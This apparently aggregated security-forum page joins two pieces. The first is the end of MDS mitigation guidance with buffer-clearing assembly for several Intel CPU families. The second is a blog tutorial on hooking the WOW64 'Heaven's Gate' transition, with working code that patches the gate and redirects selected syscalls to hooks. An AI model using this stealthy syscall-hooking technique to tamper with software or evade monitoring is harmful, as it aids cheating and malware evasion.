Some of these sequences use %xmm0 to overwrite the microarchitectural buffers. It is safe to assume that this value contains no protected data because we perform this sequence before returning to user mode (which can directly access %xmm0). While the overwrite operation makes the %xmm0 value visible to the sibling thread via the MDS vulnerability, we assume that group scheduling ensures that the process on the sibling thread is trusted by the process on the thread returning to user mode.

Note that in virtualized environments, VMMs may not provide guest OSes with the true information about which real physical processor model is in use. In these environments we recommend that the guest OSes always use VERW.

Nehalem, Westmere, Sandy Bridge, and Ivy Bridge

The following sequence can overwrite the affected data buffers for processor families code named Nehalem, Westmere, Sandy Bridge, or Ivy Bridge. It requires a 672-byte writable buffer that is WB-memtype, aligned to 16 bytes, and the first 16 bytes are initialized to 0. Note this sequence will overwrite buffers with the value in XMM0. If the function is called in a context where this is not acceptable (where XMM0 contains protected data), then XMM0 should be saved/restored.

```c
static inline void IVB_clear_buf(char *zero_ptr)
{
    __asm__ __volatile__ (
        "lfence                      \n\t"
        "orpd (%0), %%xmm0           \n\t"
        "orpd (%0), %%xmm1           \n\t"
        "mfence                      \n\t"
        "movl $40, %%ecx             \n\t"
        "addq $16, %0                \n\t"
        "1: movntdq %%xmm0, (%0)     \n\t"   /* 40 x 16-byte non-temporal stores */
        "addq $16, %0                \n\t"
        "decl %%ecx                  \n\t"
        "jnz 1b                      \n\t"
        "mfence                      \n\t"
        /* %0 is advanced inside the asm, so it must be a read-write
         * ("+r") operand rather than a plain input. */
        : "+r" (zero_ptr)
        :
        : "ecx", "cc", "memory");
}
```

Haswell and Broadwell

The following sequence can overwrite the affected data buffers for processors based on the Haswell or Broadwell microarchitectures. It requires a 1.5 KB writable buffer with WB-memtype that is aligned to 16 bytes. Note this sequence will overwrite buffers with the value in XMM0.

```c
static inline void BDW_clear_buf(char *dst)
{
    __asm__ __volatile__ (
        "movq %0, %%rdi              \n\t"
        "movq %0, %%rsi              \n\t"
        "movl $40, %%ecx             \n\t"
        "1: movntdq %%xmm0, (%0)     \n\t"
        "addq $16, %0                \n\t"
        "decl %%ecx                  \n\t"
        "jnz 1b                      \n\t"
        "mfence                      \n\t"
        "movl $1536, %%ecx           \n\t"
        "rep movsb                   \n\t"   /* copy the 1.5 KB buffer onto itself */
        "lfence                      \n\t"
        /* %0 is modified inside the asm, so declare it read-write. */
        : "+r" (dst)
        :
        : "eax", "ecx", "edi", "esi", "cc", "memory");
}
```

Skylake, Kaby Lake, and Coffee Lake

For processors based on the Skylake, Kaby Lake, or Coffee Lake microarchitectures, the required sequences depend on which vector extensions are enabled. These sequences require a 6 KB writable buffer with WB-memtype, as well as up to 64 bytes of zero data aligned to 64 bytes.
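The buffers these sequences need can be set up once ahead of time. A minimal user-space sketch in C11 with hypothetical names; a kernel would use its own allocator instead. It assumes that ordinary heap memory is mapped write-back (typical, but not guaranteed by this code) and aligns the 6 KB buffer to 64 bytes, which is our choice so that each CLFLUSHOPT in the sequences below targets a distinct cache line. The 64-byte zero block serves the SSE, AVX, and AVX-512 variants alike.

```c
#include <stdalign.h>
#include <stdint.h>
#include <stdlib.h>

#define SKL_CLEAR_BUF_SIZE 6144   /* 6 KB scratch buffer */

/* 64 bytes of zeros aligned to 64 bytes (static storage is zeroed). */
static alignas(64) const unsigned char skl_zero[64];

static int is_aligned(const void *p, size_t a)
{
    return ((uintptr_t)p % a) == 0;
}

/* C11 aligned_alloc: the size must be a multiple of the alignment,
 * which holds for 6144 and 64. Caller frees with free(). */
static unsigned char *skl_alloc_clear_buf(void)
{
    return aligned_alloc(64, SKL_CLEAR_BUF_SIZE);
}
```

The zero block would then be passed as the second argument, for example `_do_skl_avx(buf, (const __m256i *)skl_zero)`.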

If the processor does not support Intel® Advanced Vector Extensions (Intel® AVX) or Intel® Advanced Vector Extensions 512 (Intel® AVX-512), then this SSE sequence can be used. It clobbers RAX, RDI, and RCX.

```c
#include <immintrin.h>   /* __m128i, __m256i, __m512i */

void _do_skl_sse(char *dst, const __m128i *zero_ptr)
{
    __asm__ __volatile__ (
        "lfence\n\t"
        "orpd (%1), %%xmm0\n\t"
        "orpd (%1), %%xmm0\n\t"
        "xorl %%eax, %%eax\n\t"
        "1:clflushopt 5376(%0,%%rax,8)\n\t"   /* flush 12 lines from dst+5376 */
        "addl $8, %%eax\n\t"
        "cmpl $8*12, %%eax\n\t"
        "jb 1b\n\t"
        "sfence\n\t"
        "movl $6144, %%ecx\n\t"
        "xorl %%eax, %%eax\n\t"
        "rep stosb\n\t"                        /* zero the whole 6 KB buffer */
        "mfence\n\t"
        : "+D" (dst)
        : "r" (zero_ptr)
        : "eax", "ecx", "cc", "memory"
    );
}
```

If the processor supports Intel AVX but does not support Intel AVX-512, then this Intel AVX sequence can be used. It clobbers RAX, RDI, and RCX.

```c
void _do_skl_avx(char *dst, const __m256i *zero_ptr)
{
    __asm__ __volatile__ (
        "lfence\n\t"
        "vorpd (%1), %%ymm0, %%ymm0\n\t"
        "vorpd (%1), %%ymm0, %%ymm0\n\t"
        "xorl %%eax, %%eax\n\t"
        "1:clflushopt 5376(%0,%%rax,8)\n\t"
        "addl $8, %%eax\n\t"
        "cmpl $8*12, %%eax\n\t"
        "jb 1b\n\t"
        "sfence\n\t"
        "movl $6144, %%ecx\n\t"
        "xorl %%eax, %%eax\n\t"
        "rep stosb\n\t"
        "mfence\n\t"
        : "+D" (dst)
        : "r" (zero_ptr)
        : "eax", "ecx", "cc", "memory", "ymm0"
    );
}
```

If the processor supports Intel AVX-512, then this sequence can be used. Note that the usage of Intel AVX-512 operations may impact the processor frequency. Using VERW with MD_CLEAR support will not impact processor frequency and thus is recommended. It clobbers RAX, RDI, and RCX.

```c
void _do_skl_avx512(char *dst, const __m512i *zero_ptr)
{
    __asm__ __volatile__ (
        "lfence\n\t"
        "vorpd (%1), %%zmm0, %%zmm0\n\t"
        "vorpd (%1), %%zmm0, %%zmm0\n\t"
        "xorl %%eax, %%eax\n\t"
        "1:clflushopt 5376(%0,%%rax,8)\n\t"
        "addl $8, %%eax\n\t"
        "cmpl $8*12, %%eax\n\t"
        "jb 1b\n\t"
        "sfence\n\t"
        "movl $6144, %%ecx\n\t"
        "xorl %%eax, %%eax\n\t"
        "rep stosb\n\t"
        "mfence\n\t"
        : "+D" (dst)
        : "r" (zero_ptr)
        : "eax", "ecx", "cc", "memory", "zmm0"
    );
}
```

Atom (Silvermont and Airmont only)

The following sequence can overwrite the store buffers for processors based on the Silvermont or Airmont microarchitectures. It requires a 256-byte writable buffer that is WB-memtype and aligned to 16 bytes. Note this sequence will overwrite buffers with the value in XMM0. If the function is called in a context where this is not acceptable (where XMM0 contains protected data), then XMM0 should be saved/restored.

Because Silvermont and Airmont do not support SMT, these sequences may not be needed when entering/exiting C-states. It clobbers RCX.

```c
static inline void SLM_clear_sb(char *zero_ptr)
{
    __asm__ __volatile__ (
        "movl $16, %%ecx             \n\t"
        "1: movntdq %%xmm0, (%0)     \n\t"   /* 16 x 16 bytes = 256 bytes */
        "addq $16, %0                \n\t"
        "decl %%ecx                  \n\t"
        "jnz 1b                      \n\t"
        "mfence                      \n\t"
        /* %0 is advanced inside the asm, so it is a read-write operand. */
        : "+r" (zero_ptr)
        :
        : "ecx", "cc", "memory");
}
```

Knights Landing and Knights Mill

The following software sequences can overwrite store buffers for processors based on Knights Landing and Knights Mill. It requires a 1,152-byte writable buffer that is WB-memtype and aligned to 64 bytes.

Knights family processors repartition store buffers when a thread wakes or enters a sleep state. Software should execute this sequence before a thread goes to sleep, as well as between when the thread wakes and when it executes untrusted code. Note that Knights family processors support user-level MWAIT which, when enabled by the OS, can prevent the OS from being aware of when a thread sleeps/wakes.

The Knights software sequence only needs to overwrite store buffers and thus does not require rendezvous of threads. It can be run regardless of what the other threads are doing.

void KNL_clear_sb(char *dst)
{
    __asm__ __volatile__ (
        "xorl %%eax, %%eax\n\t"
        "movl $16, %%ecx\n\t"
        "cld \n\t"
        "rep stosq\n\t"
        "movl $128, %%ecx\n\t"
        "rep stosq\n\t"
        "mfence\n\t"
        : "+D" (dst)
        :: "eax", "ecx", "cc", "memory"
    );
}

Footnotes

- Assists are conditions that are handled internally by the processor and thus do not require software involvement. Assists restart and complete the instruction without needing software involvement, whereas faults do need software involvement (for example, an exception handler). For example, setting the Dirty bit in a page table entry may be done using an assist.

- CPUID.(EAX=7H,ECX=0):EDX[MD_CLEAR=10]

- Some processors may only enumerate MD_CLEAR after microcode updates.

- On processors that enumerate both CPUID.(EAX=7H,ECX=0):EDX[MD_CLEAR=10] and CPUID.(EAX=7H,ECX=0):EDX[L1D_FLUSH=28]

- This example assumes that the DS selector indicates a writable segment.

- Simultaneous multithreading (SMT) is a technique for improving the overall efficiency of superscalar CPUs with hardware multithreading. SMT permits multiple independent threads of execution to better utilize the resources provided by modern processor architectures. Intel® Hyper-Threading technology (Intel® HT) is Intel’s implementation of SMT.
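The CPUID enumeration referenced in the footnotes above comes down to two bit tests on the EDX value returned by leaf 7, sub-leaf 0. Here is a minimal sketch that stays portable by taking that EDX value as a parameter instead of executing CPUID itself. The function and macro names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Bit positions in CPUID.(EAX=7H,ECX=0):EDX, as given in the footnotes. */
#define CPUID7_EDX_MD_CLEAR  10u
#define CPUID7_EDX_L1D_FLUSH 28u

/* True if the EDX value reports MD_CLEAR (VERW also overwrites the buffers). */
static bool has_md_clear(uint32_t edx)
{
    return (edx >> CPUID7_EDX_MD_CLEAR) & 1u;
}

/* True if the EDX value reports the L1D_FLUSH command. */
static bool has_l1d_flush(uint32_t edx)
{
    return (edx >> CPUID7_EDX_L1D_FLUSH) & 1u;
}
```

On x86, recent GCC and Clang releases provide `__get_cpuid_count(7, 0, &eax, &ebx, &ecx, &edx)` in `<cpuid.h>` to obtain the EDX value. As noted above, a processor may only report MD_CLEAR after a microcode update.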

Sursa:

-

Hooking Heaven’s Gate — a WOW64 hooking technique

May 15

This is not new, this is not novel, and definitely not my research, but I used it recently, so here is my attempt at explaining some cool WOW64 concepts. I also want to take a break from reading the AMD/Intel manuals to write this hypervisor. I also think the term “Heaven’s Gate” is quite appropriate and is the coolest thing ever, so here we have it.

Introduction

I usually add some pictures here to show how I started my journey, but because it was 2 months ago on a free Slack (shoutout to GuidedHacking), I don’t have the logs anymore. Either way, it went something like this…

Me: Yoooooooo any good technique to catch a manual syscall?!?!?
GH: That is going to be tough.
GH: Wait, is it Wow64?
Me: Yes
GH: You can’t manual syscall on Wow64, you coconut.
Me: ????

So there you have it: there is no such thing as a manual syscall on WOW64. Well, there is one way, but I will cover that topic at a later time. (Hint: Heaven’s Gate)

First, we need to understand a bit about WOW64.

WoW64 (Windows 32-bit on Windows 64-bit)

I will only cover a very small part of it, simply because the subsystem is complicated and I could easily make mistakes.

WOW64 applies to 32-bit applications running on a 64-bit machine. This means that while there are only very small differences in how the 32-bit and the 64-bit kernels work, there are undoubtedly incompatibilities. This subsystem tries to mitigate those incompatibilities through various interfaces such as wow64.dll, wow64win.dll, and wow64cpu.dll. There is also a different registry environment for WOW64 applications vs native 64-bit applications, but let’s not get into that mess.

An interesting behavior to notice while executing a WOW64 application is that all kernel-mode components on a 64-bit machine will always execute in 64-bit mode, regardless of whether the application’s instructions are 64-bit or not.

In short, WOW64 applications run a bit differently than native 64-bit applications, and we are going to take advantage of that. Let’s look at the difference when it comes to calling a WINAPI.

NTDLL.dll vs NTDLL.dll

Ntdll.dll on a Windows machine is widely covered and I won’t go too deep into that. We are only interested in what ntdll.dll does when performing a WINAPI call that requires a syscall. Let’s pick Cheat Engine as our debugger (because it can see both DLLs) and TeamViewer as our WOW64 application.


Ara ara? What is so strange about this

If this were a live conversation, I would torment you with this question, but it is not. Notice that the 3 WOW64 interface DLLs I mentioned earlier are loaded, but the particular thing you want to notice is the two ntdll.dll modules. What is even more bizarre is that one of them is currently residing in a 64-bit address space. Wtf? How? This is a 32-bit application!

The answer: WOW64.

The Differences

I am sure there are a ton more differences between the two dlls but let’s cover the very first obvious difference, the syscalls.

We all know (if not, now you do) that in a normal native application, ntdll.dll is the one responsible for performing the syscall/sysenter, handing execution over to the kernel. But I also mentioned earlier that you cannot perform a syscall in a WOW64 application. So how does a WOW64 application do… anything?

Take an example function such as NtReadVirtualMemory: we would expect a service ID to be placed in the EAX register, followed by a syscall/sysenter instruction.

No syscall, at all

Okay, now that’s weird. There is no syscall. Instead, there is a call, and I know for sure you can’t enter kernel land with just a call. Let’s follow the call!

A jump to wow64transition inside wow64cpu.dll

Another jump, into another jump…hold up, is that “RAX” I see?.. isn’t RAX a 64-bit register ?

We are now somewhere inside wow64cpu.dll, in code called Wow64Transition that is now executing the 64-bit instruction set. We also see that it references the CS:0x33 segment. What is going on?

In Alex Ionescu’s blog, he said:

In fact, on 64-bit Windows, the first piece of code to execute in *any* process, is always the 64-bit NTDLL, which takes care of initializing the process in user-mode (as a 64-bit process!). It’s only later that the Windows-on-Windows (WoW64) interface takes over, loads a 32-bit NTDLL, and execution begins in 32-bit mode through a far jump to a compatibility code segment. The 64-bit world is never entered again, except whenever the 32-bit code attempts to issue a system call. The 32-bit NTDLL that was loaded, instead of containing the expected SYSENTER instruction, actually contains a series of instructions to jump back into 64-bit mode, so that the system call can be issued with the SYSCALL instruction, and so that parameters can be sent using the x64 ABI, sign-extending as needed.

What this means is that when 32-bit code tries to perform a syscall, it goes through the 32-bit ntdll.dll and then to this particular transition gate (Heaven’s Gate). The gate performs a far jump into a code segment with long mode (64-bit) enabled. That is the 0033:wow64cpu.dll+0x7009 you see in the latest screenshot. Now that we are in a 64-bit context, we can finally go to the 64-bit ntdll.dll, which is where the real syscall is performed.

You can specify the 64-bit WINAPI version in Cheat Engine by putting _ before the API’s name

Finally the expected syscall

There you have it, the full WOW64 syscall chain. Let’s summarize.

32-bit ntdll.dll -> wow64cpu.dll’s Heaven’s Gate -> 64-bit ntdll.dll -> syscall into the kernel

Now that we understand the full execution chain, let’s get hooking!

Hooking Heaven’s Gate

As hackers, we are always looking for a stealthy way to hook stuff. Hooking Heaven’s Gate is not truly stealthy, but it is a lot stealthier (and more useful) than hooking individual WINAPI functions. That is because ALL syscalls go through ONE gate, so by hooking this ONE gate, you are hooking ALL syscalls.

The Plan

Our plan is quite simple. We will do what we usually do with a normal detour hook.

- We will place a jmp of some sort on the transition gate/Heaven’s Gate, which will then jump to our shellcode

- Our shellcode will select what service id to hook and jump to the appropriate hook.

- Once our hook finishes executing, it will jump to the transition gate/Heaven’s Gate.

- Transition gate/Heaven’s Gate will continue on with the context switch into 64-bit and execute as normal
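Steps 2 and 3 of the plan are a dispatch on the service ID in EAX. Here is a minimal sketch that models that dispatch in portable C rather than x86 assembly, so it can run anywhere. A small table maps service IDs to hook handlers, and any ID not in the table falls through to the original gate. The IDs 0x3f and 0x50 are the values the post uses for NtReadVirtualMemory and NtProtectVirtualMemory. Syscall numbers change between Windows builds, so treat them as placeholders. Every function and type name here is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef int (*gate_fn)(uint32_t service_id);

/* Tags returned so the routing decision can be observed. */
enum { ROUTE_ORIGINAL = 0, ROUTE_HOOK_NTRVM = 1, ROUTE_HOOK_NTPVM = 2 };

/* Stand-in for the saved original gate (the far jmp into 64-bit mode). */
static int original_gate(uint32_t id) { (void)id; return ROUTE_ORIGINAL; }

/* Each hook does its work, then continues into the saved original gate,
 * mirroring "jmp lpJmpRealloc" at the end of the real hooks. */
static int hook_ntrvm(uint32_t id) { (void)original_gate(id); return ROUTE_HOOK_NTRVM; }
static int hook_ntpvm(uint32_t id) { (void)original_gate(id); return ROUTE_HOOK_NTPVM; }

struct hook_entry { uint32_t service_id; gate_fn handler; };

/* Placeholder, build-specific service IDs taken from the post. */
static const struct hook_entry hook_table[] = {
    { 0x3f, hook_ntrvm },   /* NtReadVirtualMemory    */
    { 0x50, hook_ntpvm },   /* NtProtectVirtualMemory */
};

/* Equivalent of the cmp/je chain: route to a hook on a match,
 * otherwise fall through to the original gate. */
static int fake_gate(uint32_t eax)
{
    for (size_t i = 0; i < sizeof hook_table / sizeof hook_table[0]; i++)
        if (hook_table[i].service_id == eax)
            return hook_table[i].handler(eax);
    return original_gate(eax);
}
```

A table keeps the hooked set in one place. The assembly version in the post unrolls the same comparisons into a `cmp`/`je` pair per service ID.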

But first, how does the application know where Heaven’s Gate is located?

Answer: FS:0xC0 aka TIB + 0xC0

FastSysCall is another name for the Transition Gate aka Heaven’s Gate

So, in theory, we could determine where Heaven’s Gate is by using this code snippet.

// FS:[0xC0] (TIB + 0xC0) holds the address of the transition gate
const DWORD_PTR __declspec(naked) GetGateAddress()
{
    __asm
    {
        mov eax, dword ptr fs : [0xC0]
        ret
    }
}

Now that we know where the current Heaven’s Gate is, and we are going to hook it, let’s create a “backup” of the code we are about to modify.

const LPVOID CreateNewJump()
{
    // Allocate an executable page and copy the 9-byte far jmp from Heaven's Gate into it
    lpJmpRealloc = VirtualAlloc(nullptr, 4096, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(lpJmpRealloc, (void *)GetGateAddress(), 9);
    return lpJmpRealloc;
}

This allocates a new page and copies the 9-byte far jmp from Heaven’s Gate into it. I won’t cover why in detail, but if you want the specific term, we are creating a trampoline for our detour hook. This lets us preserve the far jmp instruction that we are about to overwrite in the next step.

The 9 bytes is the instruction we are backing up: jmp 0033:wow64cpu.dll + 7009

Next, we are going to replace that far jmp with a PUSH Addr, RET sequence, which effectively acts as an absolute jump. (PUSH places the address you want to jump to on the stack, and RET pops it from the stack and jumps there.)

void __declspec(naked) hk_Wow64Trampoline()
{
    __asm
    {
        cmp eax, 0x3f   // 64-bit syscall ID of NtRVM
        je hk_NtReadVirtualMemory
        cmp eax, 0x50   // 64-bit syscall ID of NtPVM
        je hk_NtProtectVirtualMemory
        jmp lpJmpRealloc
    }
}

const LPVOID CreateNewJump()
{
    DWORD_PTR Gate = GetGateAddress();
    lpJmpRealloc = VirtualAlloc(nullptr, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(lpJmpRealloc, (void *)Gate, 9);
    return lpJmpRealloc;
}

const void WriteJump(const DWORD_PTR dwWow64Address, const void *pBuffer, size_t ulSize)
{
    DWORD dwOldProtect = 0;
    VirtualProtect((LPVOID)dwWow64Address, 0x1000, PAGE_EXECUTE_READWRITE, &dwOldProtect);
    (void)memcpy((void *)dwWow64Address, pBuffer, ulSize);
    VirtualProtect((LPVOID)dwWow64Address, 0x1000, dwOldProtect, &dwOldProtect);
}

const void EnableWow64Redirect()
{
    LPVOID Hook_Gate = &hk_Wow64Trampoline;
    // unsigned char: byte values above 0x7F would be a narrowing conversion for (signed) char
    unsigned char trampolineBytes[] = {
        0x68, 0xDD, 0xCC, 0xBB, 0xAA,   /* push 0xAABBCCDD (placeholder address) */
        0xC3,                           /* ret */
        0xCC, 0xCC, 0xCC                /* padding */
    };
    memcpy(&trampolineBytes[1], &Hook_Gate, 4);   // patch in the real hook address
    WriteJump(GetGateAddress(), trampolineBytes, sizeof(trampolineBytes));
}

This code overwrites the 9-byte FAR JMP and includes all the VirtualProtect calls you need.
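The patch written by EnableWow64Redirect has three parts, 9 bytes in total:

- a 5-byte `push imm32` (opcode 0x68), with the hook address stored little-endian in bytes 1 to 4;
- a 1-byte `ret` (0xC3);
- three 0xCC padding bytes.

Here is a portable sketch of the backup-then-patch sequence, operating on a plain byte array so it runs anywhere. `build_push_ret` and `patch_gate` are hypothetical helpers. Patching real code would still need the VirtualProtect calls shown above.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define GATE_PATCH_SIZE 9

/* Encode "push addr; ret; int3; int3; int3" for a 32-bit target address.
 * Bytes are written explicitly so the result does not depend on host endianness. */
static void build_push_ret(uint8_t out[GATE_PATCH_SIZE], uint32_t addr)
{
    out[0] = 0x68;                     /* push imm32                  */
    out[1] = (uint8_t)(addr);          /* imm32, little-endian        */
    out[2] = (uint8_t)(addr >> 8);
    out[3] = (uint8_t)(addr >> 16);
    out[4] = (uint8_t)(addr >> 24);
    out[5] = 0xC3;                     /* ret: pops addr into EIP     */
    out[6] = out[7] = out[8] = 0xCC;   /* int3 padding                */
}

/* Save the original bytes into `backup` (the trampoline), then overwrite the gate. */
static void patch_gate(uint8_t *gate, uint8_t backup[GATE_PATCH_SIZE], uint32_t hook_addr)
{
    uint8_t patch[GATE_PATCH_SIZE];
    memcpy(backup, gate, GATE_PATCH_SIZE);
    build_push_ret(patch, hook_addr);
    memcpy(gate, patch, GATE_PATCH_SIZE);
}
```

Copying the original bytes to a new page works here because a direct far jmp encodes an absolute selector:offset target. A relative jmp or call would need its displacement fixed up after being moved.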

Let’s dissect hk_Wow64Trampoline.

So we know that before any syscall happens, the service ID is ALWAYS in the EAX register. Therefore, we can use a cmp instruction to determine what is being called and jmp to the appropriate hook function. In our case we are doing 2 cmps (but you can do as many as you want), one with 0x3f and one with 0x50, for NtRVM and NtPVM. If the EAX register holds the syscall we are looking for, je (jump-if-equal) is taken and we land in our hook function. If it is not the syscall we want, execution takes the jmp to lpJmpRealloc. That is the buffer we created in our CreateNewJump function, holding the 9 original bytes that we copied over before overwriting them.

void __declspec(naked) hk_NtProtectVirtualMemory()
{
    __asm
    {
        // Save EAX (the service ID), then copy the five stack arguments into globals
        mov Backup_Eax, eax
        mov eax, [esp + 0x8]
        mov Handle, eax
        mov eax, [esp + 0xC]
        mov Address_1, eax
        mov eax, [esp + 0x10]
        mov DwSizee, eax
        mov eax, [esp + 0x14]
        mov New, eax
        mov eax, [esp + 0x18]
        mov Old, eax
        mov eax, Backup_Eax
        pushad
    }
    printf("NtPVM Handle: [%x] Address: [0x%x] Size: [%d] NewProtect: [0x%x]\n", Handle, Address_1, *DwSizee, New);
    __asm popad
    __asm jmp lpJmpRealloc
}

void __declspec(naked) hk_NtReadVirtualMemory()
{
    __asm pushad
    printf("Calling NtReadVirtualMemory.\n");
    __asm popad
    __asm jmp lpJmpRealloc
}

Note that before doing anything within the hook function, you must pushad/pushfd, and later popfd/popad, to preserve the registers and the flags. If you do not do this, expect the program to crash in no time.
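hk_NtProtectVirtualMemory reads the first argument at [esp + 0x8] and each following argument 4 bytes further up. That fits a stack holding two return addresses on entry to the gate: one pushed by the caller of NtProtectVirtualMemory and one pushed by the `call` inside the 32-bit ntdll stub. This is an assumption about the stub layout, chosen because it matches the post's offsets. Anything the hook pushes shifts those offsets. `pushad` pushes eight 32-bit registers (32 bytes) and `pushfd` pushes 4 more. Here is a minimal sketch of that arithmetic. `wow64_arg_offset` is a hypothetical helper.

```c
#include <assert.h>
#include <stddef.h>

#define RETURN_ADDRS_ON_STACK 2   /* assumption: caller's and ntdll stub's return addresses */
#define PUSHAD_BYTES (8 * 4)      /* EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI                  */
#define PUSHFD_BYTES 4            /* EFLAGS                                                  */

/* ESP-relative offset of 32-bit argument `index` (0-based) after the hook
 * has pushed `saved_bytes` bytes of its own. */
static size_t wow64_arg_offset(unsigned index, size_t saved_bytes)
{
    return saved_bytes + RETURN_ADDRS_ON_STACK * 4 + (size_t)index * 4;
}
```

This is why the hook copies the arguments into globals before `pushad`. Reading them afterward would mean adding 0x20 to every offset (0x24 with `pushfd` as well).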

Similarly, I’ve tried very hard to get the values inside the __declspec(naked) function through its arguments, but it just doesn’t work. You end up using ECX as a register, and in my experience ECX happens to hold a 64-bit value.

PUSHAD will lose the first 4 bytes of ECX

Please let me know if you know of a way to get something like this to work.

DWORD __declspec(naked) hk_NtProtectVirtualMemory(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN OUT PULONG NumberOfBytesToProtect,
    IN ULONG NewAccessProtection,
    OUT PULONG OldAccessProtection
)

Summary

In summary, when you are running as a WOW64 process, you cannot access the kernel directly. You have to go through a transition gate aka Heaven’s Gate to switch into 64-bit mode before entering kernel land. This transition can be hooked with a traditional detour, which is what this post covers.

The technique detours the transition gate into a fake gate that conditionally jumps to the correct hook function based on the service number. Once the hook function finishes executing, it jumps to the copy of the transition gate that we backed up. This switches us from 32-bit mode into 64-bit mode, and execution continues into the 64-bit ntdll.dll. The 64-bit ntdll.dll then performs the syscall and enters kernel land.

32bit Ntdll -> Heaven’s Gate (hooked) -> Fake Gate -> hook_function -> Heaven’s Gate Trampoline -> 64bit Ntdll -> Kernel land

Result

Take a look at the example code here.

10/10 paint job